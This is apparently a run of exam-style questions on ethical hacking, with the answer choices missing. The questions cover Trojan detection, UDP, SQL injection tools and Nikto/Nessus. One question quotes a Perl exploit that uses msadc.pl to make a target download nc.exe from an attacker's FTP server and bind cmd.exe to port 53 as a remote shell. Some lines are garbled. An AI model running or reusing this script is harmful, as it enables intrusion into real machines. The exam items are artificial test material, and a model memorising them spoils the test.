Your friend plans to install a Trojan on your computer. He knows that if he gives you a new version of chess.exe, you
will definitely install the game on your computer. He picks up a Trojan and joins it to chess.exe. The size of chess.exe
was 526,895 bytes originally, and after joining this chess file to the Trojan, the file size increased to 651,823 bytes.
When he gives you this new game, you install the infected chess.exe file on your computer. He now performs various
malicious tasks on your computer remotely. But you suspect that someone has installed a Trojan on your computer
and begin to investigate it. When you enter the netstat command in the command prompt, you get the following results:
C:\WINDOWS>netstat -an | find "UDP"
UDP IP_Address:31337 *:*
Now you check the following registry address:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
In the above address, you notice a 'default' key in the 'Name' field having " .exe" value in the
corresponding 'Data' field. Which of the following Trojans do you think your friend may have installed on your
computer on the basis of the above evidence?
Which of the following protocols uses only User Datagram Protocol (UDP)?
Which of the following tools is an automated tool that is used to implement SQL injections and to retrieve data from
Web server databases?
You want to integrate the Nikto tool with nessus vulnerability scanner. Which of the following steps will you take to accomplish the task?
Each correct answer represents a complete solution. Choose two.
Adam, a malicious hacker performs an exploit, which is given below:
#####################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = '[email protected]';# password
#####################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h
$host -C \"echo
open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host - C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet
$host $port"); exit(0);
Which of the following is the expected result of the above exploit?
